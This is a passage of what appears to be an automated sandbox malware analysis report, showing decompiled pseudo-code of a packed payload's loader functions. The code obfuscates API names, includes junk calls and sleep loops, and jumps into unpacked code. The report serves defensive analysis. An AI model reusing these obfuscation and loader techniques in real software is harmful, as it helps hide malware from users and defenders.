    					_t33 =  *0x405002;
    					_t34 =  *_t33;
    					 *0x405002 = _t34;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L21;
    					}
    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L21;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t39);
    					 *0x40501a =  *0x40501a + _t39;
    					__eflags =  *((intOrPtr*)(_t77 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t77 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push(0xf);
    				 *_t79 =  *_t79 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				_t18 = E00402BB3(_t18);
    				__eflags = _t18;
    				if(_t18 != 0) {
    					goto L9;
    				}
    				_push( *0x4050cf);
    				_t42 = E00402AD0(_t18);
    				_push(0xf);
    				 *_t79 =  *_t79 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				_t18 = E00402BB3(_t42);
    				__eflags = _t18;
    				if(_t18 != 0) {
    					goto L9;
    				}
    				_push( *0x4050cf);
    				_t43 = E00402AD0(_t18);
    				_push(0xf);
    				 *_t79 =  *_t79 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				_t18 = E00402BB3(_t43);
    				__eflags = _t18;
    				if(_t18 != 0) {
    					goto L9;
    				}
    				_push(E00402749);
    				return E00402749;
    			}

    APIs
    • HeapCreate.KERNELBASE ref: 004019E1
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 47%
    			E00401077() {
    				void* _t11;
    				void* _t12;
    				intOrPtr _t14;
    				intOrPtr _t15;
    				struct HINSTANCE__* _t19;
    				intOrPtr _t20;
    				struct HINSTANCE__* _t23;
    				void* _t24;
    				intOrPtr _t25;
    				long _t27;
    				intOrPtr* _t29;
    				intOrPtr _t30;
    				void* _t35;
    				void* _t37;
    				void* _t38;
    				void* _t39;
    				intOrPtr* _t44;
    				void* _t48;
    				void* _t52;
    				void* _t54;
    				intOrPtr* _t56;
    
    				_push("zzdjjqpqaxlgt");
    				_t12 = E00402E18(_t11);
    				_push(1);
    				 *_t56 =  *_t56 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t12) != 0) {
    					L18:
    					_push(0xf);
    					 *_t56 =  *_t56 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					_t14 = E00402BB3(_t13);
    					__eflags = _t14;
    					if(_t14 != 0) {
    						L6:
    						_push(1);
    						 *_t56 =  *_t56 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t15 = E00401CAE(_t14); // executed
    						__eflags = _t15;
    						if(_t15 != 0) {
    							L22:
    							L23:
    							goto L23;
    						}
    						__eflags = _t54 - 0xfd00;
    						if(_t54 < 0xfd00) {
    							goto L22;
    						}
    						 *0x305061 = 0x6b;
    						 *0x00305062 = 0x65;
    						 *0x00305063 = 0x72;
    						 *0x00305064 = 0x6e;
    						 *0x00305065 = 0x65;
    						 *0x00305066 = 0x6c;
    						 *0x00305067 = 0x33;
    						_t19 = LoadLibraryA("kernel32.dll");
    						 *0x40500e = _t19;
    						_t44 = "pejpCreate";
    						 *_t44 = 0x70616548;
    						 *((short*)(_t44 + 4)) = 0x7243;
    						 *((short*)(_t44 + 6)) = 0x6165;
    						_push(_t44);
    						_push(_t19);
    						_push(__imp__LoadLibraryExW);
    						_pop( *0x40500a);
    						_push(_t19);
    						_push(1);
    						 *_t56 =  *_t56 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t20 = E00401CAE(_t19); // executed
    						__eflags = _t20;
    						if(_t20 != 0) {
    							goto L22;
    						}
    						L"oidsapi.dll" = 0x6e;
    						M00405038 = 0x74;
    						_t23 = LoadLibraryExW( &((L"")[1]), 0, 0);
    						 *((intOrPtr*)(_t54 - 4)) = _t23;
    						_push(_t23);
    						__eflags = _t23;
    						if(_t23 == 0) {
    							goto L22;
    						}
    						_push("zzdjjqpqaxlgt"); // executed
    						_t24 = E00402E18(_t23); // executed
    						_push("true");
    						 *_t56 =  *_t56 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz"); // executed
    						_t25 = E00402BB3(_t24); // executed
    						__eflags = _t25;
    						if(_t25 != 0) {
    							goto L22;
    						}
    						_push(0x1e);
    						do {
    							_t27 = WaitForSingleObject(0xffffffff, 1); // executed
    							 *_t56 =  *_t56 - 1;
    							__eflags =  *_t56;
    						} while ( *_t56 != 0);
    						_t56 = _t56 + 4;
    						 *0x40501a = 0;
    						_push("zzdjjqpqaxlgt"); // executed
    						E00402E18(_t27); // executed
    						_pop(_t48);
    						 *_t56 =  *_t56 +  *((intOrPtr*)(_t48 + 0x3c));
    						_t52 = _t48;
    						 *0x405002 = _t52 + 0xa4;
    						_t29 =  *0x405002;
    						_t30 =  *_t29;
    						 *0x405002 = _t30;
    						__eflags =  *0x405002 - 0xfff;
    						if(__eflags > 0) {
    							goto L22;
    						}
    						asm("sbb dword [ecx], 0xa0");
    						if(__eflags < 0) {
    							goto L22;
    						}
    						 *0x405016 = GetProcAddress();
    						LoadLibraryA("kernel32.dll");
    						 *0x40501a = E004019C6;
    						_push(E00402749);
    						_pop(_t35);
    						 *0x40501a =  *0x40501a + _t35;
    						__eflags =  *((intOrPtr*)(_t54 - 4)) - 0xffffffff;
    						if( *((intOrPtr*)(_t54 - 4)) != 0xffffffff) {
    							 *0x40501a =  *0x40501a - E00402749;
    							_t13 =  *0x40501a; // 0x0
    							goto __eax;
    						}
    						 *0x40501a =  *0x40501a ^ E004019C6;
    						goto __eax;
    					}
    					_push("zzdjjqpqaxlgt");
    					_t37 = E00402E18(_t14);
    					_push( *0x4050cf);
    					_t38 = E00402AD0(_t37);
    					_push(0xf);
    					 *_t56 =  *_t56 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					_t14 = E00402BB3(_t38);
    					__eflags = _t14;
    					if(_t14 != 0) {
    						goto L6;
    					}
    					_push(0xf);
    					 *_t56 =  *_t56 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					_t14 = E00402BB3(_t14);
    					__eflags = _t14;
    					if(_t14 != 0) {
    						goto L6;
    					}
    					_push("zzdjjqpqaxlgt");
    					_t39 = E00402E18(_t14);
    					_push("zzdjjqpqaxlgt");
    					E00402E18(_t39);
    					_push(0x401a44);
    					return 0x401a44;
    				} else {
    					_push(0xf);
    					 *_t56 =  *_t56 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					if(_t13 != 0) {
    						goto L18;
    					} else {
    						_push(1);
    						 *_t56 =  *_t56 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf");
    						if(_t13 != 0) {
    							goto L18;
    						} else {
    							_push(1);
    							 *_t56 =  *_t56 - 1;
    							_push("vwzhywkzcohliu");
    							_push("oledcrpjmksdjf");
    							if(_t13 != 0) {
    								goto L18;
    							} else {
    								_push(0xf);
    								 *_t56 =  *_t56 - 1;
    								_push(0x4050b3);
    								_push("bkktdsxxkjueaz");
    								if(_t13 != 0) {
    									goto L18;
    								} else {
    									_push( *0x4050cf);
    									E00402AD0(_t13);
    									_push(0x401e1e);
    									return 0x401e1e;
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 49%
    			E00401364() {
    				void* _t11;
    				intOrPtr _t13;
    				intOrPtr _t14;
    				struct HINSTANCE__* _t18;
    				intOrPtr _t19;
    				struct HINSTANCE__* _t22;
    				void* _t23;
    				intOrPtr _t24;
    				long _t26;
    				intOrPtr* _t28;
    				intOrPtr _t29;
    				void* _t34;
    				void* _t37;
    				void* _t38;
    				void* _t39;
    				void* _t40;
    				void* _t42;
    				void* _t43;
    				void* _t44;
    				intOrPtr* _t46;
    				void* _t50;
    				void* _t54;
    				void* _t56;
    				intOrPtr* _t58;
    
    				_push(1);
    				 *_t58 =  *_t58 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t11) != 0) {
    					L19:
    					_push(0xf);
    					 *_t58 =  *_t58 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					_t13 = E00402BB3(_t12);
    					__eflags = _t13;
    					if(_t13 != 0) {
    						L5:
    						_push(1);
    						 *_t58 =  *_t58 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t14 = E00401CAE(_t13); // executed
    						__eflags = _t14;
    						if(_t14 != 0) {
    							L17:
    							L18:
    							goto L18;
    						}
    						__eflags = _t56 - 0xfd00;
    						if(_t56 < 0xfd00) {
    							goto L17;
    						}
    						 *0x305061 = 0x6b;
    						 *0x00305062 = 0x65;
    						 *0x00305063 = 0x72;
    						 *0x00305064 = 0x6e;
    						 *0x00305065 = 0x65;
    						 *0x00305066 = 0x6c;
    						 *0x00305067 = 0x33;
    						_t18 = LoadLibraryA("kernel32.dll");
    						 *0x40500e = _t18;
    						_t46 = "pejpCreate";
    						 *_t46 = 0x70616548;
    						 *((short*)(_t46 + 4)) = 0x7243;
    						 *((short*)(_t46 + 6)) = 0x6165;
    						_push(_t46);
    						_push(_t18);
    						_push(__imp__LoadLibraryExW);
    						_pop( *0x40500a);
    						_push(_t18);
    						_push(1);
    						 *_t58 =  *_t58 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t19 = E00401CAE(_t18); // executed
    						__eflags = _t19;
    						if(_t19 != 0) {
    							goto L17;
    						}
    						L"oidsapi.dll" = 0x6e;
    						M00405038 = 0x74;
    						_t22 = LoadLibraryExW( &((L"")[1]), 0, 0);
    						 *((intOrPtr*)(_t56 - 4)) = _t22;
    						_push(_t22);
    						__eflags = _t22;
    						if(_t22 == 0) {
    							goto L17;
    						}
    						_push("zzdjjqpqaxlgt"); // executed
    						_t23 = E00402E18(_t22); // executed
    						_push("true");
    						 *_t58 =  *_t58 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz"); // executed
    						_t24 = E00402BB3(_t23); // executed
    						__eflags = _t24;
    						if(_t24 != 0) {
    							goto L17;
    						}
    						_push(0x1e);
    						do {
    							_t26 = WaitForSingleObject(0xffffffff, 1); // executed
    							 *_t58 =  *_t58 - 1;
    							__eflags =  *_t58;
    						} while ( *_t58 != 0);
    						 *0x40501a = 0;
    						_push("zzdjjqpqaxlgt"); // executed
    						E00402E18(_t26); // executed
    						_pop(_t50);
    						 *((intOrPtr*)(_t58 + 4)) =  *((intOrPtr*)(_t58 + 4)) +  *((intOrPtr*)(_t50 + 0x3c));
    						_t54 = _t50;
    						 *0x405002 = _t54 + 0xa4;
    						_t28 =  *0x405002;
    						_t29 =  *_t28;
    						 *0x405002 = _t29;
    						__eflags =  *0x405002 - 0xfff;
    						if(__eflags > 0) {
    							goto L17;
    						}
    						asm("sbb dword [ecx], 0xa0");
    						if(__eflags < 0) {
    							goto L17;
    						}
    						 *0x405016 = GetProcAddress();
    						LoadLibraryA("kernel32.dll");
    						 *0x40501a = E004019C6;
    						_push(E00402749);
    						_pop(_t34);
    						 *0x40501a =  *0x40501a + _t34;
    						__eflags =  *((intOrPtr*)(_t56 - 4)) - 0xffffffff;
    						if( *((intOrPtr*)(_t56 - 4)) != 0xffffffff) {
    							 *0x40501a =  *0x40501a - E00402749;
    							goto __eax;
    						}
    						 *0x40501a =  *0x40501a ^ E004019C6;
    						goto __eax;
    					}
    					_push(1);
    					 *_t58 =  *_t58 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf");
    					_t13 = E00401CAE(_t13);
    					__eflags = _t13;
    					if(_t13 != 0) {
    						goto L5;
    					}
    					_push("zzdjjqpqaxlgt");
    					_t37 = E00402E18(_t13);
    					_push( *0x4050cf);
    					_t38 = E00402AD0(_t37);
    					_push( *0x4050cf);
    					_t39 = E00402AD0(_t38);
    					_push("zzdjjqpqaxlgt");
    					_t40 = E00402E18(_t39);
    					_push(0xf);
    					 *_t58 =  *_t58 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					_t13 = E00402BB3(_t40);
    					__eflags = _t13;
    					if(_t13 != 0) {
    						goto L5;
    					}
    					_push(E00401811);
    					return E00401811;
    				} else {
    					_push( *0x4050cf);
    					_t42 = E00402AD0(_t12);
    					_push(1);
    					 *_t58 =  *_t58 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf");
    					if(E00401CAE(_t42) != 0) {
    						goto L19;
    					} else {
    						_push("zzdjjqpqaxlgt");
    						_t43 = E00402E18(_t12);
    						_push(0xf);
    						 *_t58 =  *_t58 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz");
    						if(E00402BB3(_t43) != 0) {
    							goto L19;
    						} else {
    							_push("zzdjjqpqaxlgt");
    							_t44 = E00402E18(_t12);
    							_push(1);
    							 *_t58 =  *_t58 - 1;
    							_push("vwzhywkzcohliu");
    							_push("oledcrpjmksdjf");
    							if(E00401CAE(_t44) != 0) {
    								goto L19;
    							} else {
    								_push(0x401e1e);
    								return 0x401e1e;
    							}
    						}
    					}
    				}
    			}

    Address column (one instruction address per decompiled line above, detached from the code in extraction): the body of this function lies at 0x00401364-0x004013fd and 0x00402bba-0x00402c41, plus the shared block at 0x00401e1e-0x00401fd9 and 0x00402749-0x0040274c.

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 44%
    			E004022EC() {
    				void* _t11;
    				void* _t12;
    				void* _t14;
    				void* _t15;
    				struct HINSTANCE__* _t19;
    				void* _t20;
    				struct HINSTANCE__* _t23;
    				void* _t24;
    				void* _t25;
    				long _t27;
    				intOrPtr* _t29;
    				intOrPtr _t30;
    				void* _t35;
    				signed int _t36;
    				void* _t37;
    				void* _t38;
    				void* _t41;
    				void* _t42;
    				void* _t43;
    				intOrPtr* _t45;
    				void* _t49;
    				void* _t53;
    				void* _t55;
    				intOrPtr* _t57;
    				void* _t66;
    
    				_push("zzdjjqpqaxlgt");
    				_t12 = E00402E18(_t11);
    				_push(1);
    				 *_t57 =  *_t57 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t12) != 0) {
    					L17:
    					_push("zzdjjqpqaxlgt");
    					_t14 = E00402E18(_t13);
    					_push(0xf);
    					 *_t57 =  *_t57 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					if(E00402BB3(_t14) != 0) {
    						L1:
    						_push(1);
    						 *_t57 =  *_t57 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t15 = E00401CAE(_t13); // executed
    						if(_t15 != 0 || _t55 < 0xfd00) {
    							L21:
    							L22:
    							goto L22;
    						} else {
    							 *0x305061 = 0x6b;
    							 *0x00305062 = 0x65;
    							 *0x00305063 = 0x72;
    							 *0x00305064 = 0x6e;
    							 *0x00305065 = 0x65;
    							 *0x00305066 = 0x6c;
    							 *0x00305067 = 0x33;
    							_t19 = LoadLibraryA("kernel32.dll");
    							 *0x40500e = _t19;
    							_t45 = "pejpCreate";
    							 *_t45 = 0x70616548;
    							 *((short*)(_t45 + 4)) = 0x7243;
    							 *((short*)(_t45 + 6)) = 0x6165;
    							_push(_t45);
    							_push(_t19);
    							_push(__imp__LoadLibraryExW);
    							_pop( *0x40500a);
    							_push(_t19);
    							_push(1);
    							 *_t57 =  *_t57 - 1;
    							_push("vwzhywkzcohliu");
    							_push("oledcrpjmksdjf"); // executed
    							_t20 = E00401CAE(_t19); // executed
    							if(_t20 != 0) {
    								goto L21;
    							}
    							L"oidsapi.dll" = 0x6e;
    							M00405038 = 0x74;
    							_t23 = LoadLibraryExW( &((L"")[1]), 0, 0);
    							 *((intOrPtr*)(_t55 - 4)) = _t23;
    							_push(_t23);
    							if(_t23 == 0) {
    								goto L21;
    							}
    							_push("zzdjjqpqaxlgt"); // executed
    							_t24 = E00402E18(_t23); // executed
    							_push("true");
    							 *_t57 =  *_t57 - 1;
    							_push(0x4050b3);
    							_push("bkktdsxxkjueaz"); // executed
    							_t25 = E00402BB3(_t24); // executed
    							if(_t25 != 0) {
    								goto L21;
    							}
    							_push(0x1e);
    							do {
    								_t27 = WaitForSingleObject(0xffffffff, 1); // executed
    								 *_t57 =  *_t57 - 1;
    							} while ( *_t57 != 0);
    							_t57 = _t57 + 4;
    							 *0x40501a = 0;
    							_push("zzdjjqpqaxlgt"); // executed
    							E00402E18(_t27); // executed
    							_pop(_t49);
    							 *_t57 =  *_t57 +  *((intOrPtr*)(_t49 + 0x3c));
    							_t53 = _t49;
    							 *0x405002 = _t53 + 0xa4;
    							_t29 =  *0x405002;
    							_t30 =  *_t29;
    							 *0x405002 = _t30;
    							_t66 =  *0x405002 - 0xfff;
    							if(_t66 > 0) {
    								goto L21;
    							}
    							asm("sbb dword [ecx], 0xa0");
    							if(_t66 < 0) {
    								goto L21;
    							}
    							 *0x405016 = GetProcAddress();
    							LoadLibraryA("kernel32.dll");
    							 *0x40501a = E004019C6;
    							_push(E00402749);
    							_pop(_t35);
    							 *0x40501a =  *0x40501a + _t35;
    							if( *((intOrPtr*)(_t55 - 4)) != 0xffffffff) {
    								 *0x40501a =  *0x40501a - E00402749;
    								_t36 =  *0x40501a; // 0x0
    								goto __eax;
    							}
    							 *0x40501a =  *0x40501a ^ E004019C6;
    							goto __eax;
    						}
    					}
    					_push(0xf);
    					 *_t57 =  *_t57 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					if(_t13 != 0) {
    						goto L1;
    					}
    					_push( *0x4050cf);
    					_t41 = E00402AD0(_t13);
    					_push( *0x4050cf);
    					_t42 = E00402AD0(_t41);
    					_push( *0x4050cf);
    					_t43 = E00402AD0(_t42);
    					_push(0xf);
    					 *_t57 =  *_t57 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					if(E00402BB3(_t43) != 0) {
    						goto L1;
    					}
    					_push(E0040274E);
    					return E0040274E;
    				} else {
    					_push("zzdjjqpqaxlgt");
    					_t37 = E00402E18(_t36);
    					_push(0xf);
    					 *_t57 =  *_t57 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					if(E00402BB3(_t37) != 0) {
    						goto L17;
    					} else {
    						_push(1);
    						 *_t57 =  *_t57 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf");
    						if(_t13 != 0) {
    							goto L17;
    						} else {
    							_push( *0x4050cf);
    							_t38 = E00402AD0(_t13);
    							_push(1);
    							 *_t57 =  *_t57 - 1;
    							_push("vwzhywkzcohliu");
    							_push("oledcrpjmksdjf");
    							if(E00401CAE(_t38) != 0) {
    								goto L17;
    							} else {
    								_push(0x401e1e);
    								return 0x401e1e;
    							}
    						}
    					}
    				}
    			}

    Address column (one instruction address per decompiled line above, detached from the code in extraction): the body of E004022EC lies at 0x004022ec-0x00402384 and 0x004025f4-0x0040267c, plus the shared block at 0x00401e1e-0x00401fd9 and 0x00402749-0x0040274c.

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 48%
    			E00401409() {
    				void* _t11;
    				intOrPtr _t13;
    				intOrPtr _t14;
    				struct HINSTANCE__* _t18;
    				intOrPtr _t19;
    				struct HINSTANCE__* _t22;
    				void* _t23;
    				intOrPtr _t24;
    				long _t26;
    				intOrPtr* _t28;
    				intOrPtr _t29;
    				void* _t34;
    				void* _t37;
    				void* _t39;
    				void* _t40;
    				intOrPtr* _t42;
    				void* _t46;
    				void* _t50;
    				void* _t52;
    				intOrPtr* _t54;
    
    				_push(0xf);
    				 *_t54 =  *_t54 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t11) != 0) {
    					L5:
    					_push(0xf);
    					 *_t54 =  *_t54 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					_t13 = E00402BB3(_t12);
    					__eflags = _t13;
    					if(_t13 != 0) {
    						L10:
    						_push(1);
    						 *_t54 =  *_t54 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t14 = E00401CAE(_t13); // executed
    						__eflags = _t14;
    						if(_t14 != 0) {
    							L22:
    							L23:
    							goto L23;
    						}
    						__eflags = _t52 - 0xfd00;
    						if(_t52 < 0xfd00) {
    							goto L22;
    						}
    						 *0x305061 = 0x6b;
    						 *0x00305062 = 0x65;
    						 *0x00305063 = 0x72;
    						 *0x00305064 = 0x6e;
    						 *0x00305065 = 0x65;
    						 *0x00305066 = 0x6c;
    						 *0x00305067 = 0x33;
    						_t18 = LoadLibraryA("kernel32.dll");
    						 *0x40500e = _t18;
    						_t42 = "pejpCreate";
    						 *_t42 = 0x70616548;
    						 *((short*)(_t42 + 4)) = 0x7243;
    						 *((short*)(_t42 + 6)) = 0x6165;
    						_push(_t42);
    						_push(_t18);
    						_push(__imp__LoadLibraryExW);
    						_pop( *0x40500a);
    						_push(_t18);
    						_push(1);
    						 *_t54 =  *_t54 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t19 = E00401CAE(_t18); // executed
    						__eflags = _t19;
    						if(_t19 != 0) {
    							goto L22;
    						}
    						L"oidsapi.dll" = 0x6e;
    						M00405038 = 0x74;
    						_t22 = LoadLibraryExW( &((L"")[1]), 0, 0);
    						 *((intOrPtr*)(_t52 - 4)) = _t22;
    						_push(_t22);
    						__eflags = _t22;
    						if(_t22 == 0) {
    							goto L22;
    						}
    						_push("zzdjjqpqaxlgt"); // executed
    						_t23 = E00402E18(_t22); // executed
    						_push("true");
    						 *_t54 =  *_t54 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz"); // executed
    						_t24 = E00402BB3(_t23); // executed
    						__eflags = _t24;
    						if(_t24 != 0) {
    							goto L22;
    						}
    						_push(0x1e);
    						do {
    							_t26 = WaitForSingleObject(0xffffffff, 1); // executed
    							 *_t54 =  *_t54 - 1;
    							__eflags =  *_t54;
    						} while ( *_t54 != 0);
    						 *0x40501a = 0;
    						_push("zzdjjqpqaxlgt"); // executed
    						E00402E18(_t26); // executed
    						_pop(_t46);
    						 *((intOrPtr*)(_t54 + 4)) =  *((intOrPtr*)(_t54 + 4)) +  *((intOrPtr*)(_t46 + 0x3c));
    						_t50 = _t46;
    						 *0x405002 = _t50 + 0xa4;
    						_t28 =  *0x405002;
    						_t29 =  *_t28;
    						 *0x405002 = _t29;
    						__eflags =  *0x405002 - 0xfff;
    						if(__eflags > 0) {
    							goto L22;
    						}
    						asm("sbb dword [ecx], 0xa0");
    						if(__eflags < 0) {
    							goto L22;
    						}
    						 *0x405016 = GetProcAddress();
    						LoadLibraryA("kernel32.dll");
    						 *0x40501a = E004019C6;
    						_push(E00402749);
    						_pop(_t34);
    						 *0x40501a =  *0x40501a + _t34;
    						__eflags =  *((intOrPtr*)(_t52 - 4)) - 0xffffffff;
    						if( *((intOrPtr*)(_t52 - 4)) != 0xffffffff) {
    							 *0x40501a =  *0x40501a - E00402749;
    							goto __eax;
    						}
    						 *0x40501a =  *0x40501a ^ E004019C6;
    						goto __eax;
    					}
    					_push(0xf);
    					 *_t54 =  *_t54 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					_t13 = E00402BB3(_t13);
    					__eflags = _t13;
    					if(_t13 != 0) {
    						goto L10;
    					}
    					_push("zzdjjqpqaxlgt");
    					_t37 = E00402E18(_t13);
    					_push(1);
    					 *_t54 =  *_t54 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf");
    					_t13 = E00401CAE(_t37);
    					__eflags = _t13;
    					if(_t13 != 0) {
    						goto L10;
    					}
    					_push(1);
    					 *_t54 =  *_t54 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf");
    					_t13 = E00401CAE(_t13);
    					__eflags = _t13;
    					if(_t13 != 0) {
    						goto L10;
    					}
    					_push(E004015CA);
    					return E004015CA;
    				} else {
    					_push(0xf);
    					 *_t54 =  *_t54 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					if(_t12 != 0) {
    						goto L5;
    					} else {
    						_push("zzdjjqpqaxlgt");
    						_t39 = E00402E18(_t12);
    						_push( *0x4050cf);
    						_t40 = E00402AD0(_t39);
    						_push(1);
    						 *_t54 =  *_t54 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf");
    						if(E00401CAE(_t40) != 0) {
    							goto L5;
    						} else {
    							_push(0xf);
    							 *_t54 =  *_t54 - 1;
    							_push(0x4050b3);
    							_push("bkktdsxxkjueaz");
    							if(_t12 != 0) {
    								goto L5;
    							} else {
    								_push(0x401e1e);
    								return 0x401e1e;
    							}
    						}
    					}
    				}
    			}

    Address column (one instruction address per decompiled line above, detached from the code in extraction): the body of E00401409 lies at 0x00401409-0x00401497 and 0x004018b2-0x00401936, plus the shared block at 0x00401e1e-0x00401fd9 and 0x00402749-0x0040274c.

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 49%
    			_entry_(void* __eax) {
    				intOrPtr _v8;
    				void* _t12;
    				void* _t13;
    				void* _t14;
    				void* _t15;
    				void* _t16;
    				void* _t17;
    				intOrPtr _t19;
    				struct HINSTANCE__* _t23;
    				intOrPtr _t24;
    				struct HINSTANCE__* _t27;
    				void* _t28;
    				intOrPtr _t29;
    				long _t31;
    				intOrPtr* _t33;
    				intOrPtr _t34;
    				void* _t39;
    				void* _t42;
    				intOrPtr* _t44;
    				void* _t49;
    				void* _t53;
    				intOrPtr _t55;
    				intOrPtr* _t56;
    				intOrPtr* _t58;
    				intOrPtr* _t59;
    
    				_push(__eax);
    				 *_t58 = _t55;
    				_t56 = _t58;
    				_push(4);
    				_t59 = _t58 + 0xffffffa0;
    				_push( *0x4050cf);
    				_t12 = E00402AD0(__eax);
    				_push("zzdjjqpqaxlgt"); // executed
    				_t13 = E00402E18(_t12); // executed
    				_push("zzdjjqpqaxlgt"); // executed
    				_t14 = E00402E18(_t13); // executed
    				_push("true");
    				 *_t59 =  *_t59 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf"); // executed
    				_t15 = E00401CAE(_t14); // executed
    				if(_t15 != 0) {
    					L1:
    					_push( *0x4050cf);
    					_t16 = E00402AD0(_t15);
    					_push( *0x4050cf);
    					_t17 = E00402AD0(_t16);
    					_push(0xf);
    					 *_t59 =  *_t59 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					if(E00402BB3(_t17) != 0) {
    						L5:
    						_push(1);
    						 *_t59 =  *_t59 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t19 = E00401CAE(_t18); // executed
    						__eflags = _t19;
    						if(_t19 != 0) {
    							L17:
    							L18:
